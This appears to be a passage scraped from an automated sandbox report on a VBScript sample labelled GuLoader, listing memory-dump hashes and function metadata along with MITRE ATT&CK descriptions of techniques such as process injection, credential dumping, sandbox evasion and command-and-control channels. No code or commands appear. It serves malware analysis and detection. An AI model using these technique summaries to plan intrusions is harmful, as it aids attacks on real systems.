Memory Dump Source

Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d7f2fc515e633c2145594463b5418dd0d4bed808dbb9c7d2d0f3534ce13f69
Instruction ID: c8ba3b089600ea7c6da482d321cb873b616f94ccd6c0c19c5733dea950f0d049
Opcode Fuzzy Hash: 98d7f2fc515e633c2145594463b5418dd0d4bed808dbb9c7d2d0f3534ce13f69
Instruction Fuzzy Hash: A7F0E576600209DFC700EB58E1416ADF7A2EF80305F10846AE5068B350CF39A905CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0829BB46, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac7a08df3c4eb77fef8e2df210dee13946a51fe758fee1c24dbab47335d0246
Instruction ID: a0bcb2da3ae907b5c463ce26e3efc31e9d142306f86c56e96fd6a5ffa46a7615
Opcode Fuzzy Hash: 7ac7a08df3c4eb77fef8e2df210dee13946a51fe758fee1c24dbab47335d0246
Instruction Fuzzy Hash: FDF03930B412189BDB11DB94EC25BED7772EF85312F1000A9E605AB2E1CB392D10CB50

Uniqueness

Uniqueness Score: -1.00%

Function 089FFCAC, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
Instruction ID: bea483a5cc97a868281552dff87e1b4420df0e15b1905c7a6b0711201f2703b6
Opcode Fuzzy Hash: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
Instruction Fuzzy Hash: 74E0C939E1011ACFCB54EF94D480CEDB375AF44315B1148A5DD116B362DF34AD02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 089FFCA3, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
Instruction ID: bea483a5cc97a868281552dff87e1b4420df0e15b1905c7a6b0711201f2703b6
Opcode Fuzzy Hash: e661c8091ee0cd24945c62351d7e19003e599648d1f832a6fd79268f39536723
Instruction Fuzzy Hash: 74E0C939E1011ACFCB54EF94D480CEDB375AF44315B1148A5DD116B362DF34AD02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 089D6000, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362223ece63a563d85b378b6fe1bd67056a5cded20e46fab317482079d5a06fd
Instruction ID: b1b3a97576c36da381c79ebd515b705a4b111e9a951c70427088496aedec072e
Opcode Fuzzy Hash: 362223ece63a563d85b378b6fe1bd67056a5cded20e46fab317482079d5a06fd
Instruction Fuzzy Hash: 00E012345007549FD335DB25D444B11BBE8AF49229F14CA9DD49B47661C7B2F849C780

Uniqueness

Uniqueness Score: -1.00%

Function 089B859C, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e23db470b26d3a2cb7274ad18d3d872c990e52791e1e1e728031f58286e9b0
Instruction ID: 5a72554b7c734c6efd8f5441d0f72d8f73997cf3387828ecb28d62a581ccad7a
Opcode Fuzzy Hash: 32e23db470b26d3a2cb7274ad18d3d872c990e52791e1e1e728031f58286e9b0
Instruction Fuzzy Hash: 81E04F762106048BD710EA58E4417BD7796DB88255F04886AD61A87651DB38A9064B51

Uniqueness

Uniqueness Score: -1.00%

Function 089B861F, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437155577.00000000089B0000.00000040.00000001.sdmp, Offset: 089B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8ef82b072ef162abcd6a7e64258b82016721680be120ea268f77f678610092
Instruction ID: 3bafd574cbb0e901cc440f1d6a7ed22b96b1ef03bd6f53440e80a2fb838b86a0
Opcode Fuzzy Hash: cb8ef82b072ef162abcd6a7e64258b82016721680be120ea268f77f678610092
Instruction Fuzzy Hash: E8E026762006048FD710EB4CE4417FE7796DFC8312F00883AD61B87751CF38A9064B41

Uniqueness

Uniqueness Score: -1.00%

Function 0829AC52, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16431664858.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebd9614c0bc33b8c3b96530221f08137337922fb41aa620fcc8c8c7988b28e3
Instruction ID: bc5dc89694b730643f5418459135cd35d8e39898a884864edee1b3b96bb4cd30
Opcode Fuzzy Hash: bebd9614c0bc33b8c3b96530221f08137337922fb41aa620fcc8c8c7988b28e3
Instruction Fuzzy Hash: B0D05EE541E3905FCB228F28D8244643F709E5320134B01C3D4928F563DA1A990AEB22

Uniqueness

Uniqueness Score: -1.00%

Function 089D88DD, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311dcc96649f65f6fb8f0bb0e005488d777c26f68d62a8c0fe7a6e43b44b4991
Instruction ID: 9cbd501f2a516ae540aaf32d23df10d17d706e4c571b708273b1a07a86beb12c
Opcode Fuzzy Hash: 311dcc96649f65f6fb8f0bb0e005488d777c26f68d62a8c0fe7a6e43b44b4991
Instruction Fuzzy Hash: 1DD0A71800F3D02FC7077720EC104553F387A83383318C4F29060B7193C2154944D3E5

Uniqueness

Uniqueness Score: -1.00%

Function 089D83C0, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3cf8464f20774371091bc4e143fe1088f190941ff6cff6a6af3f013fce1e72c
Instruction ID: 4d30f1587d8cf31b4e4df3589befc565b5dc9fe3634e9cb2bae71626e332183a
Opcode Fuzzy Hash: e3cf8464f20774371091bc4e143fe1088f190941ff6cff6a6af3f013fce1e72c
Instruction Fuzzy Hash: 61D05E352100109FC700EB6CE809E95BBF9EB8D361B0141A6FB09C73A2CA359C008B91

Uniqueness

Uniqueness Score: -1.00%

Function 0898FF2A, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
Instruction ID: 2e3374e80c8e4c15c08d0b1cd9e0eea05154c51e8db3c1cd667badc3f3607770
Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
Instruction Fuzzy Hash: 9AD09235A00019CBCF04DF88D8447DCF7B0FB8832AF1480AAD918B7281C776A956CB64

Uniqueness

Uniqueness Score: -1.00%

Function 089DF221, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9d89df56d59eaa7e4591e7ce5d1306fe0a88e6e01fd7bd5fbebcccfe0509e1
Instruction ID: ca9cd35faa6f5c33ada197695efd34e0dca23181eae6787d8d03e27799de440f
Opcode Fuzzy Hash: ad9d89df56d59eaa7e4591e7ce5d1306fe0a88e6e01fd7bd5fbebcccfe0509e1
Instruction Fuzzy Hash: 79C0122500B3C96F86222275290889A3E2C888312034487D2B024860E79E2C890482A6

Uniqueness

Uniqueness Score: -1.00%

Function 089DF3C1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ac7253544befd90a75c2a9215341b77ac5bcc884693bd88b36a27da3912be0
Instruction ID: 80d1aebbdc0f1cbfc2e1dd2390ce6baaecab1b69dcd123ee5bc80488d84cbd43
Opcode Fuzzy Hash: e5ac7253544befd90a75c2a9215341b77ac5bcc884693bd88b36a27da3912be0
Instruction Fuzzy Hash: 37C08C3144F3C10FC3238738606809C7F22DF93228B2808EED0CB86093CEAB482A8711

Uniqueness

Uniqueness Score: -1.00%

Function 089DF230, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c35a19a853bcdca0691b24ca04ef68affc6ec8cb24f5f8c220193af6964dffa
Instruction ID: 4636aa473d321b7166de79d0f5f5b0924c42c3febbd9f5c27b52a858b5960d17
Opcode Fuzzy Hash: 8c35a19a853bcdca0691b24ca04ef68affc6ec8cb24f5f8c220193af6964dffa
Instruction Fuzzy Hash: 29A0223200038C8F822022B03008808B32CC082A00380C8A8E00C830028F3EEC0000C0

Uniqueness

Uniqueness Score: -1.00%

Function 089DF3D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68248ace54f03ae1178830bc11e48710c912c22d2b090f5c0d1e70e68ab82ba
Instruction ID: 2270977a0609072c0b2602e4062806864953d3713422629bc1d0fd14ada55d90
Opcode Fuzzy Hash: a68248ace54f03ae1178830bc11e48710c912c22d2b090f5c0d1e70e68ab82ba
Instruction Fuzzy Hash: 7EA0223000030C8B828222B8300888C332CE082B223808828E00C830008F3EEC0000C0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DETAILS.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Function 08264A90, Relevance: 8.0, Strings: 6, Instructions: 512
COMMON

Function 0842C6E0, Relevance: 5.3, Strings: 4, Instructions: 319
COMMON

Function 08498E68, Relevance: 4.3, Strings: 3, Instructions: 520
COMMON

Function 04898FC0, Relevance: 4.2, Strings: 2, Instructions: 1711
COMMON

Function 04899018, Relevance: 4.2, Strings: 2, Instructions: 1694
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre